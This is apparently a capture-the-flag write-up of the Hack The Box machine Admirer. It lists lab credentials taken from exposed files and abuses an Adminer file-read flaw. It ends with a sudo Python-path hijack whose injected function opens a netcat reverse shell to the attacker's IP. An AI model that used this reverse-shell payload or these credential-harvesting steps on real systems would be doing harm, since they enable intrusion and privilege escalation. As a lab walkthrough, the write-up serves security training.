ur - Admirer - 10.10.10.187

Using autorrecon we see the following ports

![59a460ad1fa13766735d57e34ac71c54.png](../../_resources/96cc64cfde33491baaaff0e86dccb029.png)

inspecting the files from the autorecon of the webserver we see the robots.txt

![5e3a8caeb9c95c41fda8d02afff1c97d.png](../../_resources/673c0880b93741dfa48312816a77d909.png)

guessing at some files via the comment left we get one file at :```http://10.10.10.187/admin-dir/contacts.txt```

```
##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb


##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb

# Amy
Email: a.bialik@admirer.htb

# Leonard
Email: l.galecki@admirer.htb



#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb

# Bernadette
Email: b.rauch@admirer.htb
```

We also get at : ```http://10.10.10.187/admin-dir/credentials.txt```

```
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!
```

attempting to login to ftp with the ftpuser
we get the following message


![34100f9c528010db9e691534ab0ba1d0.png](../../_resources/523fbb5cb4a8492ab4eefe4191f9551f.png)

when we use passive mode we get 
and extracting the zip



in this zip we see that there is a file info.php which just prints the content of the phpinfo()



Then running admin_tasks.php



Looking at the php the dumps are performed client side.
Sending the request to repeter we can quickly pull the output of each option

Uptime :

 up 27 minutes
loggedin users:

02:30:16 up 29 min,  3 users,  load average: 0.69, 0.64, 0.49
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
waldo    pts/0    10.10.14.53      02:02   31.00s  0.31s  0.31s -bash
waldo    pts/1    10.10.14.15      02:18    1:12   0.07s  0.07s -bash
waldo    pts/2    10.10.15.204     02:09    6.00s  0.24s  0.24s -bash
crontab:

no crontab for www-data
other options:

Insufficient privileges to perform the selected operation.

nowe we see the DB credantials
html/utility-scripts/db_admin.php
```
<?php
  $servername = "localhost";
  $username = "waldo";
  $password = "Wh3r3_1s_w4ld0?";
```
html/index.php
```php
<?php
                        $servername = "localhost";
                        $username = "waldo";
                        $password = "]F7jLHw:*G>UPrTo}~A"d6b";
                        $dbname = "admirerdb";
```


| User  | password | Worked on | 
| --- | --- | --- | 
| admin | w0rdpr3ss01! | |
| ftpuser | %n?4Wz}R$tTF7 | FTP |
| w.cooper@admirer.htb | fgJr6q#S\W:$P | |
| waldo.11 | Ezy]m27}OREc$ | | 
| waldo | Wh3r3_1s_w4ld0? | |
| waldo | ]F7jLHw:*G>UPrTo}~A"d6b | |
| waldo | ]F7jLHw:*G>UPrTo}~Ad6b | |


If we ssh in as the ftpuser we get the following message


![272d9eea5483af9876a3a87737693295.png](../../_resources/0b9a6302088942eb9bff57e238e5d1ee.png)

we know there is a mira db on teh box.
Thus we can do a local port forward to expose the port using the ssh
we use the -N to block the session from a command as doing so would close 


![a3d3588a89120893558669f1b75acd2f.png](../../_resources/105d8552602e4d33beb9c9d7ec385da7.png)


googleing we find a adminer db php file at :``` http://10.10.10.187/utility-scripts/adminer.php```



![d6edd4f459e18c6149e1e891393a4450.png](../../_resources/ed1b45aec56548ecaedafcb8e8a3c21a.png)

googleing this version we get 
https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool

logging in to our selevs


![1667c6bcb2b45420216a9fcaa3574f07.png](../../_resources/f8e57c0c72034e85b567e033eb385491.png)

ecexuting sql



![f20b2dea5be5d08d096c7a60f5a0d28d.png](../../_resources/89834d80e90b4bd999961d3be991acbd.png)

create a DB


![4d731d5007ed16b2429362fe41c76b32.png](../../_resources/a8c106723be645eb8f4c07cdd91de14c.png)


checking the table we find



![8afe28faae6e354ae908de4bd74d3754.png](../../_resources/6ac3a68798a74c6ca7f9898e37c61af1.png)




| User  | password | Worked on | 
| --- | --- | --- | 
| admin | w0rdpr3ss01! | |
| ftpuser | %n?4Wz}R$tTF7 | FTP, SSH |
| w.cooper@admirer.htb | fgJr6q#S\W:$P | |
| waldo.11 | Ezy]m27}OREc$ | | 
| waldo | Wh3r3_1s_w4ld0? | |
| waldo | ]F7jLHw:*G>UPrTo}~A"d6b | |
| waldo | &<h5b~yK3F#{PaPB&dA}{H> | Mysql |


attempting to login



![c82c5e455624157384af9773e27ee8e3.png](../../_resources/6db6f5405f934307ad5039b36dd51c8a.png)



![a68792e48a1382dae17965ae314e8aec.png](../../_resources/a57d219686a442a796b48bb34d907ede.png)


however attemptng to login with ssh we get


![400ef61b11fe79809b73e3727057e4e5.png](../../_resources/e45e91bee86b492a93284e0b616eb7a4.png)

looking at sudo we find we can run the wierd script from before as root.


![e90cfe4dfc78a7d99dba2170d632b2fe.png](../../_resources/222aec7f083e492eb18a5ae4d1ba90b1.png)


looking at the script


![b0f6b0388c80026ada6c098464b499f8.png](../../_resources/60e5e09528a84fb29e7807c1f4042109.png)

this calls this python script 



![e8a33958daceed6f49fa8752e218331f.png](:/3669a026be8b47288f4683cebbcadec1)

We can inject into this by affecting thepython path when we sudo.
hence i create a pyhton shell command
```python
import os 

def make_archive(a, b, c):
    os.exec("/bin/nc 10.10.14.5 1337 -e /bin/bash")
```
attempting to just call /bin/bash failed as the script is ran in the background. however nc worked



![2b98da4b0692e1e4c9587f320086498f.png](../../_resources/7a0a2a2bdf1841c092a103c03d3ce2da.png)


![faf325c270a5c099d17c995437fc29fa.png](../../_resources/73f0d6bdf5b346fa8151c8c859bf6891.png)



